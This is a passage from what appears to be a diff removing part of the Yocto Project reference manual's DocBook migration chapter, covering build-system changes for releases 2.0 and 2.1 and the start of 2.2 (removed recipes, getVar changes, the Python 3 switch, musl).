- <filename>d.setVar('</filename><replaceable>VARNAME</replaceable><filename>', None)</filename>
- result in the variable and all of its overrides being
- cleared out.
- Before the change, only the non-overridden values
- were cleared.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.0-shell-message-function-changes'>
- <title>Shell Message Function Changes</title>
-
- <para>
- The shell versions of the BitBake message functions (i.e.
- <filename>bbdebug</filename>, <filename>bbnote</filename>,
- <filename>bbwarn</filename>, <filename>bbplain</filename>,
- <filename>bberror</filename>, and <filename>bbfatal</filename>)
- are now connected through to their BitBake equivalents
- <filename>bb.debug()</filename>, <filename>bb.note()</filename>,
- <filename>bb.warn()</filename>, <filename>bb.plain()</filename>,
- <filename>bb.error()</filename>, and
- <filename>bb.fatal()</filename>, respectively.
- Thus, those message functions that you would expect to be printed
- by the BitBake UI are now actually printed.
- In practice, this change means two things:
- <itemizedlist>
- <listitem><para>
- If you now see messages on the console that you did not
- previously see as a result of this change, you might
- need to clean up the calls to
- <filename>bbwarn</filename>, <filename>bberror</filename>,
- and so forth.
- Or, you might want to simply remove the calls.
- </para></listitem>
- <listitem><para>
- The <filename>bbfatal</filename> message function now
- suppresses the full error log in the UI, which means any
- calls to <filename>bbfatal</filename> where you still
- wish to see the full error log should be replaced by
- <filename>die</filename> or
- <filename>bbfatal_log</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.0-extra-development-debug-package-cleanup'>
- <title>Extra Development/Debug Package Cleanup</title>
-
- <para>
- The following recipes have had extra
- <filename>dev/dbg</filename> packages removed:
- <itemizedlist>
- <listitem><para>
- <filename>acl</filename>
- </para></listitem>
- <listitem><para>
- <filename>apmd</filename>
- </para></listitem>
- <listitem><para>
- <filename>aspell</filename>
- </para></listitem>
- <listitem><para>
- <filename>attr</filename>
- </para></listitem>
- <listitem><para>
- <filename>augeas</filename>
- </para></listitem>
- <listitem><para>
- <filename>bzip2</filename>
- </para></listitem>
- <listitem><para>
- <filename>cogl</filename>
- </para></listitem>
- <listitem><para>
- <filename>curl</filename>
- </para></listitem>
- <listitem><para>
- <filename>elfutils</filename>
- </para></listitem>
- <listitem><para>
- <filename>gcc-target</filename>
- </para></listitem>
- <listitem><para>
- <filename>libgcc</filename>
- </para></listitem>
- <listitem><para>
- <filename>libtool</filename>
- </para></listitem>
- <listitem><para>
- <filename>libxmu</filename>
- </para></listitem>
- <listitem><para>
- <filename>opkg</filename>
- </para></listitem>
- <listitem><para>
- <filename>pciutils</filename>
- </para></listitem>
- <listitem><para>
- <filename>rpm</filename>
- </para></listitem>
- <listitem><para>
- <filename>sysfsutils</filename>
- </para></listitem>
- <listitem><para>
- <filename>tiff</filename>
- </para></listitem>
- <listitem><para>
- <filename>xz</filename>
- </para></listitem>
- </itemizedlist>
- All of the above recipes now conform to the standard packaging
- scheme where a single <filename>-dev</filename>,
- <filename>-dbg</filename>, and <filename>-staticdev</filename>
- package exists per recipe.
- </para>
- </section>
-
- <section id='migration-2.0-recipe-maintenance-tracking-data-moved-to-oe-core'>
- <title>Recipe Maintenance Tracking Data Moved to OE-Core</title>
-
- <para>
- Maintenance tracking data for recipes that was previously part
- of <filename>meta-yocto</filename> has been moved to
- <link linkend='oe-core'>OE-Core</link>.
- The change includes <filename>package_regex.inc</filename> and
- <filename>distro_alias.inc</filename>, which are typically enabled
- when using the <filename>distrodata</filename> class.
- Additionally, the contents of
- <filename>upstream_tracking.inc</filename> has now been split out
- to the relevant recipes.
- </para>
- </section>
-
- <section id='migration-2.0-automatic-stale-sysroot-file-cleanup'>
- <title>Automatic Stale Sysroot File Cleanup</title>
-
- <para>
- Stale files from recipes that no longer exist in the current
- configuration are now automatically removed from
- sysroot as well as removed from
- any other place managed by shared state.
- This automatic cleanup means that the build system now properly
- handles situations such as renaming the build system side of
- recipes, removal of layers from
- <filename>bblayers.conf</filename>, and
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- changes.
- </para>
-
- <para>
- Additionally, work directories for old versions of recipes are
- now pruned.
- If you wish to disable pruning old work directories, you can set
- the following variable in your configuration:
- <literallayout class='monospaced'>
- SSTATE_PRUNE_OBSOLETEWORKDIR = "0"
- </literallayout>
- </para>
- </section>
-
- <section id='migration-2.0-linux-yocto-kernel-metadata-repository-now-split-from-source'>
- <title><filename>linux-yocto</filename> Kernel Metadata Repository Now Split from Source</title>
-
- <para>
- The <filename>linux-yocto</filename> tree has up to now been a
- combined set of kernel changes and configuration (meta) data
- carried in a single tree.
- While this format is effective at keeping kernel configuration and
- source modifications synchronized, it is not always obvious to
- developers how to manipulate the Metadata as compared to the
- source.
- </para>
-
- <para>
- Metadata processing has now been removed from the
- <link linkend='ref-classes-kernel-yocto'><filename>kernel-yocto</filename></link>
- class and the external Metadata repository
- <filename>yocto-kernel-cache</filename>, which has always been used
- to seed the <filename>linux-yocto</filename> "meta" branch.
- This separate <filename>linux-yocto</filename> cache repository
- is now the primary location for this data.
- Due to this change, <filename>linux-yocto</filename> is no longer
- able to process combined trees.
- Thus, if you need to have your own combined kernel repository,
- you must do the split there as well and update your recipes
- accordingly.
- See the <filename>meta/recipes-kernel/linux/linux-yocto_4.1.bb</filename>
- recipe for an example.
- </para>
- </section>
-
- <section id='migration-2.0-additional-qa-checks'>
- <title>Additional QA checks</title>
-
- <para>
- The following QA checks have been added:
- <itemizedlist>
- <listitem><para>
- Added a "host-user-contaminated" check for ownership
- issues for packaged files outside of
- <filename>/home</filename>.
- The check looks for files that are incorrectly owned by the
- user that ran BitBake instead of owned by a valid user in
- the target system.
- </para></listitem>
- <listitem><para>
- Added an "invalid-chars" check for invalid (non-UTF8)
- characters in recipe metadata variable values
- (i.e.
- <link linkend='var-DESCRIPTION'><filename>DESCRIPTION</filename></link>,
- <link linkend='var-SUMMARY'><filename>SUMMARY</filename></link>,
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>,
- and
- <link linkend='var-SECTION'><filename>SECTION</filename></link>).
- Some package managers do not support these characters.
- </para></listitem>
- <listitem><para>
- Added an "invalid-packageconfig" check for any options
- specified in
- <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>
- that do not match any <filename>PACKAGECONFIG</filename>
- option defined for the recipe.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.0-miscellaneous'>
- <title>Miscellaneous Changes</title>
-
- <para>
- These additional changes exist:
- <itemizedlist>
- <listitem><para>
- <filename>gtk-update-icon-cache</filename> has been
- renamed to <filename>gtk-icon-utils</filename>.
- </para></listitem>
- <listitem><para>
- The <filename>tools-profile</filename>
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
- item as well as its corresponding packagegroup and
- <filename>packagegroup-core-tools-profile</filename> no
- longer bring in <filename>oprofile</filename>.
- Bringing in <filename>oprofile</filename> was originally
- added to aid compilation on resource-constrained
- targets.
- However, this aid has not been widely used and is not
- likely to be used going forward due to the more powerful
- target platforms and the existence of better
- cross-compilation tools.
- </para></listitem>
- <listitem><para>
- The
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- variable's default value now specifies
- <filename>ext4</filename> instead of
- <filename>ext3</filename>.
- </para></listitem>
- <listitem><para>
- All support for the <filename>PRINC</filename>
- variable has been removed.
- </para></listitem>
- <listitem><para>
- The <filename>packagegroup-core-full-cmdline</filename>
- packagegroup no longer brings in
- <filename>lighttpd</filename> due to the fact that
- bringing in <filename>lighttpd</filename> is not really in
- line with the packagegroup's purpose, which is to add full
- versions of command-line tools that by default are
- provided by <filename>busybox</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.1-release'>
- <title>Moving to the Yocto Project 2.1 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 2.1 Release from the prior release.
- </para>
-
- <section id='migration-2.1-variable-expansion-in-python-functions'>
- <title>Variable Expansion in Python Functions</title>
-
- <para>
- Variable expressions, such as
- <filename>${</filename><replaceable>VARNAME</replaceable><filename>}</filename>
- no longer expand automatically within Python functions.
- Suppressing expansion was done to allow Python functions to
- construct shell scripts or other code for situations in which you
- do not want such expressions expanded.
- For any existing code that relies on these expansions, you need to
- change the expansions to expand the value of individual
- variables through <filename>d.getVar()</filename>.
- To alternatively expand more complex expressions,
- use <filename>d.expand()</filename>.
- </para>
- </section>
-
- <section id='migration-2.1-overrides-must-now-be-lower-case'>
- <title>Overrides Must Now be Lower-Case</title>
-
- <para>
- The convention for overrides has always been for them to be
- lower-case characters.
- This practice is now a requirement as BitBake's datastore now
- assumes lower-case characters in order to give a slight performance
- boost during parsing.
- In practical terms, this requirement means that anything that ends
- up in
- <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>
- must now appear in lower-case characters (e.g. values for
- <filename>MACHINE</filename>, <filename>TARGET_ARCH</filename>,
- <filename>DISTRO</filename>, and also recipe names if
- <filename>_pn-</filename><replaceable>recipename</replaceable>
- overrides are to be effective).
- </para>
- </section>
-
- <section id='migration-2.1-expand-parameter-to-getvar-and-getvarflag-now-mandatory'>
- <title>Expand Parameter to <filename>getVar()</filename> and
- <filename>getVarFlag()</filename> is Now Mandatory</title>
-
- <para>
- The expand parameter to <filename>getVar()</filename> and
- <filename>getVarFlag()</filename> previously defaulted to
- False if not specified.
- Now, however, no default exists so one must be specified.
- You must change any <filename>getVar()</filename> calls that
- do not specify the final expand parameter to calls that do specify
- the parameter.
- You can run the following <filename>sed</filename> command at the
- base of a layer to make this change:
- <literallayout class='monospaced'>
- sed -e 's:\(\.getVar([^,()]*\)):\1, False):g' -i `grep -ril getVar *`
- sed -e 's:\(\.getVarFlag([^,()]*, [^,()]*\)):\1, False):g' -i `grep -ril getVarFlag *`
- </literallayout>
- <note>
- The reason for this change is that it prepares the way for
- changing the default to True in a future Yocto Project release.
- This future change is a much more sensible default than False.
- However, the change needs to be made gradually as a sudden
- change of the default would potentially cause side-effects
- that would be difficult to detect.
- </note>
- </para>
- </section>
-
- <section id='migration-2.1-makefile-environment-changes'>
- <title>Makefile Environment Changes</title>
-
- <para>
- <link linkend='var-EXTRA_OEMAKE'><filename>EXTRA_OEMAKE</filename></link>
- now defaults to "" instead of "-e MAKEFLAGS=".
- Setting <filename>EXTRA_OEMAKE</filename> to "-e MAKEFLAGS=" by
- default was a historical accident that has required many classes
- (e.g. <filename>autotools</filename>, <filename>module</filename>)
- and recipes to override this default in order to work with
- sensible build systems.
- When upgrading to the release, you must edit any recipe that
- relies upon this old default by either setting
- <filename>EXTRA_OEMAKE</filename> back to "-e MAKEFLAGS=" or by
- explicitly setting any required variable value overrides using
- <filename>EXTRA_OEMAKE</filename>, which is typically only needed
- when a Makefile sets a default value for a variable that is
- inappropriate for cross-compilation using the "=" operator rather
- than the "?=" operator.
- </para>
- </section>
-
- <section id='migration-2.1-libexecdir-reverted-to-prefix-libexec'>
- <title><filename>libexecdir</filename> Reverted to <filename>${prefix}/libexec</filename></title>
-
- <para>
- The use of <filename>${libdir}/${BPN}</filename> as
- <filename>libexecdir</filename> is different as compared to all
- other mainstream distributions, which either uses
- <filename>${prefix}/libexec</filename> or
- <filename>${libdir}</filename>.
- The use is also contrary to the GNU Coding Standards
- (i.e. <ulink url='https://www.gnu.org/prep/standards/html_node/Directory-Variables.html'></ulink>)
- that suggest <filename>${prefix}/libexec</filename> and also
- notes that any package-specific nesting should be done by the
- package itself.
- Finally, having <filename>libexecdir</filename> change between
- recipes makes it very difficult for different recipes to invoke
- binaries that have been installed into
- <filename>libexecdir</filename>.
- The Filesystem Hierarchy Standard
- (i.e. <ulink url='http://refspecs.linuxfoundation.org/FHS_3.0/fhs/ch04s07.html'></ulink>)
- now recognizes the use of <filename>${prefix}/libexec/</filename>,
- giving distributions the choice between
- <filename>${prefix}/lib</filename> or
- <filename>${prefix}/libexec</filename> without breaking FHS.
- </para>
- </section>
-
- <section id='migration-2.1-ac-cv-sizeof-off-t-no-longer-cached-in-site-files'>
- <title><filename>ac_cv_sizeof_off_t</filename> is No Longer Cached in Site Files</title>
-
- <para>
- For recipes inheriting the
- <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
- class, <filename>ac_cv_sizeof_off_t</filename> is no longer cached
- in the site files for <filename>autoconf</filename>.
- The reason for this change is because the
- <filename>ac_cv_sizeof_off_t</filename> value is not necessarily
- static per architecture as was previously assumed.
- Rather, the value changes based on whether large file support is
- enabled.
- For most software that uses <filename>autoconf</filename>, this
- change should not be a problem.
- However, if you have a recipe that bypasses the standard
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task from the <filename>autotools</filename> class and the software
- the recipe is building uses a very old version of
- <filename>autoconf</filename>, the recipe might be incapable of
- determining the correct size of <filename>off_t</filename> during
- <filename>do_configure</filename>.
- </para>
-
- <para>
- The best course of action is to patch the software as necessary
- to allow the default implementation from the
- <filename>autotools</filename> class to work such that
- <filename>autoreconf</filename> succeeds and produces a working
- configure script, and to remove the
- overridden <filename>do_configure</filename> task such that the
- default implementation does get used.
- </para>
- </section>
-
- <section id='migration-2.1-image-generation-split-out-from-filesystem-generation'>
- <title>Image Generation is Now Split Out from Filesystem Generation</title>
-
- <para>
- Previously, for image recipes the
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
- task assembled the filesystem and then from that filesystem
- generated images.
- With this Yocto Project release, image generation is split into
- separate
- <link linkend='ref-tasks-image'><filename>do_image_*</filename></link>
- tasks for clarity both in operation and in the code.
- </para>
-
- <para>
- For most cases, this change does not present any problems.
- However, if you have made customizations that directly modify the
- <filename>do_rootfs</filename> task or that mention
- <filename>do_rootfs</filename>, you might need to update those
- changes.
- In particular, if you had added any tasks after
- <filename>do_rootfs</filename>, you should make edits so that
- those tasks are after the
- <link linkend='ref-tasks-image-complete'><filename>do_image_complete</filename></link>
- task rather than after <filename>do_rootfs</filename>
- so that the your added tasks
- run at the correct time.
- </para>
-
- <para>
- A minor part of this restructuring is that the post-processing
- definitions and functions have been moved from the
- <link linkend='ref-classes-image'><filename>image</filename></link>
- class to the
- <link linkend='ref-classes-rootfs*'><filename>rootfs-postcommands</filename></link>
- class.
- Functionally, however, they remain unchanged.
- </para>
- </section>
-
- <section id='migration-2.1-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed in the 2.1 release:
- <itemizedlist>
- <listitem><para><filename>gcc</filename> version 4.8:
- Versions 4.9 and 5.3 remain.
- </para></listitem>
- <listitem><para><filename>qt4</filename>:
- All support for Qt 4.x has been moved out to a separate
- <filename>meta-qt4</filename> layer because Qt 4 is no
- longer supported upstream.
- </para></listitem>
- <listitem><para><filename>x11vnc</filename>:
- Moved to the <filename>meta-oe</filename> layer.
- </para></listitem>
- <listitem><para><filename>linux-yocto-3.14</filename>:
- No longer supported.
- </para></listitem>
- <listitem><para><filename>linux-yocto-3.19</filename>:
- No longer supported.
- </para></listitem>
- <listitem><para><filename>libjpeg</filename>:
- Replaced by the <filename>libjpeg-turbo</filename> recipe.
- </para></listitem>
- <listitem><para><filename>pth</filename>:
- Became obsolete.
- </para></listitem>
- <listitem><para><filename>liboil</filename>:
- Recipe is no longer needed and has been moved to the
- <filename>meta-multimedia</filename> layer.
- </para></listitem>
- <listitem><para><filename>gtk-theme-torturer</filename>:
- Recipe is no longer needed and has been moved to the
- <filename>meta-gnome</filename> layer.
- </para></listitem>
- <listitem><para><filename>gnome-mime-data</filename>:
- Recipe is no longer needed and has been moved to the
- <filename>meta-gnome</filename> layer.
- </para></listitem>
- <listitem><para><filename>udev</filename>:
- Replaced by the <filename>eudev</filename> recipe for
- compatibility when using <filename>sysvinit</filename>
- with newer kernels.
- </para></listitem>
- <listitem><para><filename>python-pygtk</filename>:
- Recipe became obsolete.
- </para></listitem>
- <listitem><para><filename>adt-installer</filename>:
- Recipe became obsolete.
- See the
- "<link linkend='migration-2.1-adt-removed'>ADT Removed</link>"
- section for more information.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.1-class-changes'>
- <title>Class Changes</title>
-
- <para>
- The following classes have changed:
- <itemizedlist>
- <listitem><para><filename>autotools_stage</filename>:
- Removed because the
- <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
- class now provides its functionality.
- Recipes that inherited from
- <filename>autotools_stage</filename> should now inherit
- from <filename>autotools</filename> instead.
- </para></listitem>
- <listitem><para><filename>boot-directdisk</filename>:
- Merged into the <filename>image-vm</filename>
- class.
- The <filename>boot-directdisk</filename> class was rarely
- directly used.
- Consequently, this change should not cause any issues.
- </para></listitem>
- <listitem><para><filename>bootimg</filename>:
- Merged into the
- <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
- class.
- The <filename>bootimg</filename> class was rarely
- directly used.
- Consequently, this change should not cause any issues.
- </para></listitem>
- <listitem><para><filename>packageinfo</filename>:
- Removed due to its limited use by the Hob UI, which has
- itself been removed.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.1-build-system-ui-changes'>
- <title>Build System User Interface Changes</title>
-
- <para>
- The following changes have been made to the build system user
- interface:
- <itemizedlist>
- <listitem><para><emphasis>Hob GTK+-based UI</emphasis>:
- Removed because it is unmaintained and based on the
- outdated GTK+ 2 library.
- The Toaster web-based UI is much more capable and is
- actively maintained.
- See the
- "<ulink url='&YOCTO_DOCS_TOAST_URL;#using-the-toaster-web-interface'>Using the Toaster Web Interface</ulink>"
- section in the Toaster User Manual for more
- information on this interface.
- </para></listitem>
- <listitem><para><emphasis>"puccho" BitBake UI</emphasis>:
- Removed because is unmaintained and no longer useful.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.1-adt-removed'>
- <title>ADT Removed</title>
-
- <para>
- The Application Development Toolkit (ADT) has been removed
- because its functionality almost completely overlapped with the
- <ulink url='&YOCTO_DOCS_SDK_URL;#sdk-using-the-standard-sdk'>standard SDK</ulink>
- and the
- <ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extensible'>extensible SDK</ulink>.
- For information on these SDKs and how to build and use them, see the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual.
- <note>
- The Yocto Project Eclipse IDE Plug-in is still supported and
- is not affected by this change.
- </note>
- </para>
- </section>
-
- <section id='migration-2.1-poky-reference-distribution-changes'>
- <title>Poky Reference Distribution Changes</title>
-
- <para>
- The following changes have been made for the Poky distribution:
- <itemizedlist>
- <listitem><para>
- The <filename>meta-yocto</filename> layer has been renamed
- to <filename>meta-poky</filename> to better match its
- purpose, which is to provide the Poky reference
- distribution.
- The <filename>meta-yocto-bsp</filename> layer retains its
- original name since it provides reference machines for
- the Yocto Project and it is otherwise unrelated to Poky.
- References to <filename>meta-yocto</filename> in your
- <filename>conf/bblayers.conf</filename> should
- automatically be updated, so you should not need to change
- anything unless you are relying on this naming elsewhere.
- </para></listitem>
- <listitem><para>
- The
- <link linkend='ref-classes-uninative'><filename>uninative</filename></link>
- class is now enabled by default in Poky.
- This class attempts to isolate the build system from the
- host distribution's C library and makes re-use of native
- shared state artifacts across different host distributions
- practical.
- With this class enabled, a tarball containing a pre-built
- C library is downloaded at the start of the build.</para>
-
- <para>The <filename>uninative</filename> class is enabled
- through the
- <filename>meta/conf/distro/include/yocto-uninative.inc</filename>
- file, which for those not using the Poky distribution, can
- include to easily enable the same functionality.</para>
-
- <para>Alternatively, if you wish to build your own
- <filename>uninative</filename> tarball, you can do so by
- building the <filename>uninative-tarball</filename> recipe,
- making it available to your build machines
- (e.g. over HTTP/HTTPS) and setting a similar configuration
- as the one set by <filename>yocto-uninative.inc</filename>.
- </para></listitem>
- <listitem><para>
- Static library generation, for most cases, is now disabled
- by default in the Poky distribution.
- Disabling this generation saves some build time as well
- as the size used for build output artifacts.</para>
-
- <para>Disabling this library generation is accomplished
- through a
- <filename>meta/conf/distro/include/no-static-libs.inc</filename>,
- which for those not using the Poky distribution can
- easily include to enable the same functionality.</para>
-
- <para>Any recipe that needs to opt-out of having the
- "--disable-static" option specified on the configure
- command line either because it is not a supported option
- for the configure script or because static libraries are
- needed should set the following variable:
- <literallayout class='monospaced'>
- DISABLE_STATIC = ""
- </literallayout>
- </para></listitem>
- <listitem><para>
- The separate <filename>poky-tiny</filename> distribution
- now uses the musl C library instead of a heavily pared
- down <filename>glibc</filename>.
- Using musl results in a smaller
- distribution and facilitates much greater maintainability
- because musl is designed to have a small footprint.</para>
-
- <para>If you have used <filename>poky-tiny</filename> and
- have customized the <filename>glibc</filename>
- configuration you will need to redo those customizations
- with musl when upgrading to the new release.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.1-packaging-changes'>
- <title>Packaging Changes</title>
-
- <para>
- The following changes have been made to packaging:
- <itemizedlist>
- <listitem><para>
- The <filename>runuser</filename> and
- <filename>mountpoint</filename> binaries, which were
- previously in the main <filename>util-linux</filename>
- package, have been split out into the
- <filename>util-linux-runuser</filename> and
- <filename>util-linux-mountpoint</filename> packages,
- respectively.
- </para></listitem>
- <listitem><para>
- The <filename>python-elementtree</filename> package has
- been merged into the <filename>python-xml</filename>
- package.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.1-tuning-file-changes'>
- <title>Tuning File Changes</title>
-
- <para>
- The following changes have been made to the tuning files:
- <itemizedlist>
- <listitem><para>
- The "no-thumb-interwork" tuning feature has been dropped
- from the ARM tune include files.
- Because interworking is required for ARM EABI, attempting
- to disable it through a tuning feature no longer makes
- sense.
- <note>
- Support for ARM OABI was deprecated in gcc 4.7.
- </note>
- </para></listitem>
- <listitem><para>
- The <filename>tune-cortexm*.inc</filename> and
- <filename>tune-cortexr4.inc</filename> files have been
- removed because they are poorly tested.
- Until the OpenEmbedded build system officially gains
- support for CPUs without an MMU, these tuning files would
- probably be better maintained in a separate layer
- if needed.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.1-supporting-gobject-introspection'>
- <title>Supporting GObject Introspection</title>
-
- <para>
- This release supports generation of GLib Introspective
- Repository (GIR) files through GObject introspection, which is
- the standard mechanism for accessing GObject-based software from
- runtime environments.
- You can enable, disable, and test the generation of this data.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-gobject-introspection-support'>Enabling GObject Introspection Support</ulink>"
- section in the Yocto Project Development Tasks Manual
- for more information.
- </para>
- </section>
-
- <section id='migration-2.1-miscellaneous-changes'>
- <title>Miscellaneous Changes</title>
-
- <para>
- These additional changes exist:
- <itemizedlist>
- <listitem><para>
- The minimum Git version has been increased to 1.8.3.1.
- If your host distribution does not provide a sufficiently
- recent version, you can install the buildtools, which
- will provide it.
- See the
- "<link linkend='required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</link>"
- section for more information on the buildtools tarball.
- </para></listitem>
- <listitem><para>
- The buggy and incomplete support for the RPM version 4
- package manager has been removed.
- The well-tested and maintained support for RPM version 5
- remains.
- </para></listitem>
- <listitem><para>
- Previously, the following list of packages were removed
- if package-management was not in
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>,
- regardless of any dependencies:
- <literallayout class='monospaced'>
- update-rc.d
- base-passwd
- shadow
- update-alternatives
- run-postinsts
- </literallayout>
- With the Yocto Project 2.1 release, these packages are only
- removed if "read-only-rootfs" is in
- <filename>IMAGE_FEATURES</filename>, since they might
- still be needed for a read-write image even in the absence
- of a package manager (e.g. if users need to be added,
- modified, or removed at runtime).
- </para></listitem>
- <listitem><para>
- The
- <ulink url='&YOCTO_DOCS_SDK_URL;#sdk-devtool-use-devtool-modify-to-modify-the-source-of-an-existing-component'><filename>devtool modify</filename></ulink>
- command now defaults to extracting the source since that
- is most commonly expected.
- The "-x" or "--extract" options are now no-ops.
- If you wish to provide your own existing source tree, you
- will now need to specify either the "-n" or
- "--no-extract" options when running
- <filename>devtool modify</filename>.
- </para></listitem>
- <listitem><para>
- If the formfactor for a machine is either not supplied
- or does not specify whether a keyboard is attached, then
- the default is to assume a keyboard is attached rather
- than assume no keyboard.
- This change primarily affects the Sato UI.
- </para></listitem>
- <listitem><para>
- The <filename>.debug</filename> directory packaging is
- now automatic.
- If your recipe builds software that installs binaries into
- directories other than the standard ones, you no longer
- need to take care of setting
- <filename>FILES_${PN}-dbg</filename> to pick up the
- resulting <filename>.debug</filename> directories as these
- directories are automatically found and added.
- </para></listitem>
- <listitem><para>
- Inaccurate disk and CPU percentage data has been dropped
- from <filename>buildstats</filename> output.
- This data has been replaced with
- <filename>getrusage()</filename> data and corrected IO
- statistics.
- You will probably need to update any custom code that reads
- the <filename>buildstats</filename> data.
- </para></listitem>
- <listitem><para>
- The
- <filename>meta/conf/distro/include/package_regex.inc</filename>
- is now deprecated.
- The contents of this file have been moved to individual
- recipes.
- <note><title>Tip</title>
- Because this file will likely be removed in a future
- Yocto Project release, it is suggested that you remove
- any references to the file that might be in your
- configuration.
- </note>
- </para></listitem>
- <listitem><para>
- The <filename>v86d/uvesafb</filename> has been removed from
- the <filename>genericx86</filename> and
- <filename>genericx86-64</filename> reference machines,
- which are provided by the
- <filename>meta-yocto-bsp</filename> layer.
- Most modern x86 boards do not rely on this file and it only
- adds kernel error messages during startup.
- If you do still need to support
- <filename>uvesafb</filename>, you can
- simply add <filename>v86d</filename> to your image.
- </para></listitem>
- <listitem><para>
- Build sysroot paths are now removed from debug symbol
- files.
- Removing these paths means that remote GDB using an
- unstripped build system sysroot will no longer work
- (although this was never documented to work).
- The supported method to accomplish something similar is
- to set <filename>IMAGE_GEN_DEBUGFS</filename> to "1",
- which will generate a companion debug image
- containing unstripped binaries and associated debug
- sources alongside the image.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.2-release'>
- <title>Moving to the Yocto Project 2.2 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 2.2 Release from the prior release.
- </para>
-
- <section id='migration-2.2-minimum-kernel-version'>
- <title>Minimum Kernel Version</title>
-
- <para>
- The minimum kernel version for the target system and for SDK
- is now 3.2.0, due to the upgrade
- to <filename>glibc 2.24</filename>.
- Specifically, for AArch64-based targets the version is
- 3.14.
- For Nios II-based targets, the minimum kernel version is 3.19.
- <note>
- For x86 and x86_64, you can reset
- <link linkend='var-OLDEST_KERNEL'><filename>OLDEST_KERNEL</filename></link>
- to anything down to 2.6.32 if desired.
- </note>
- </para>
- </section>
-
- <section id='migration-2.2-staging-directories-in-sysroot-simplified'>
- <title>Staging Directories in Sysroot Has Been Simplified</title>
-
- <para>
- The way directories are staged in sysroot has been simplified and
- introduces the new
- <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS</filename></link>,
- <link linkend='var-SYSROOT_DIRS_NATIVE'><filename>SYSROOT_DIRS_NATIVE</filename></link>,
- and
- <link linkend='var-SYSROOT_DIRS_BLACKLIST'><filename>SYSROOT_DIRS_BLACKLIST</filename></link>.
- See the
- <ulink url='http://lists.openembedded.org/pipermail/openembedded-core/2016-May/121365.html'>v2 patch series on the OE-Core Mailing List</ulink>
- for additional information.
- </para>
- </section>
-
- <section id='migration-2.2-removal-of-old-images-from-tmp-deploy-now-enabled'>
- <title>Removal of Old Images and Other Files in <filename>tmp/deploy</filename> Now Enabled</title>
-
- <para>
- Removal of old images and other files in
- <filename>tmp/deploy/</filename> is now enabled by default due
- to a new staging method used for those files.
- As a result of this change, the
- <filename>RM_OLD_IMAGE</filename> variable is now redundant.
- </para>
- </section>
-
- <section id='migration-2.2-python-changes'>
- <title>Python Changes</title>
-
- <para>
- The following changes for Python occurred:
- </para>
-
- <section id='migration-2.2-bitbake-now-requires-python-3.4'>
- <title>BitBake Now Requires Python 3.4+</title>
-
- <para>
- BitBake requires Python 3.4 or greater.
- </para>
- </section>
-
- <section id='migration-2.2-utf-8-locale-required-on-build-host'>
- <title>UTF-8 Locale Required on Build Host</title>
-
- <para>
- A UTF-8 locale is required on the build host due to Python 3.
- Since C.UTF-8 is not a standard, the default is en_US.UTF-8.
- </para>
- </section>
-
- <section id='migration-2.2-metadata-now-must-use-python-3-syntax'>
- <title>Metadata Must Now Use Python 3 Syntax</title>
-
- <para>
- The metadata is now required to use Python 3 syntax.
- For help preparing metadata, see any of the many Python 3 porting
- guides available.
- Alternatively, you can reference the conversion commits for Bitbake
- and you can use
- <link linkend='oe-core'>OE-Core</link> as a guide for changes.
- Following are particular areas of interest:
- <literallayout class='monospaced'>
- * subprocess command-line pipes needing locale decoding
- * the syntax for octal values changed
- * the <filename>iter*()</filename> functions changed name
- * iterators now return views, not lists
- * changed names for Python modules
- </literallayout>
- </para>
- </section>
-
- <section id='migration-2.2-target-python-recipes-switched-to-python-3'>
- <title>Target Python Recipes Switched to Python 3</title>
-
- <para>
- Most target Python recipes have now been switched to Python 3.
- Unfortunately, systems using RPM as a package manager and
- providing online package-manager support through SMART still
- require Python 2.
- <note>
- Python 2 and recipes that use it can still be built for the
- target as with previous versions.
- </note>
- </para>
- </section>
-
- <section id='migration-2.2-buildtools-tarball-includes-python-3'>
- <title><filename>buildtools-tarball</filename> Includes Python 3</title>
-
- <para>
- <filename>buildtools-tarball</filename> now includes Python 3.
- </para>
- </section>
- </section>
-
- <section id='migration-2.2-uclibc-replaced-by-musl'>
- <title>uClibc Replaced by musl</title>
-
- <para>
- uClibc has been removed in favor of musl.
- Musl has matured, is better maintained, and is compatible with a
- wider range of applications as compared to uClibc.
- </para>
- </section>
-
- <section id='migration-2.2-B-no-longer-default-working-directory-for-tasks'>
- <title><filename>${B}</filename> No Longer Default Working Directory for Tasks</title>
-
- <para>
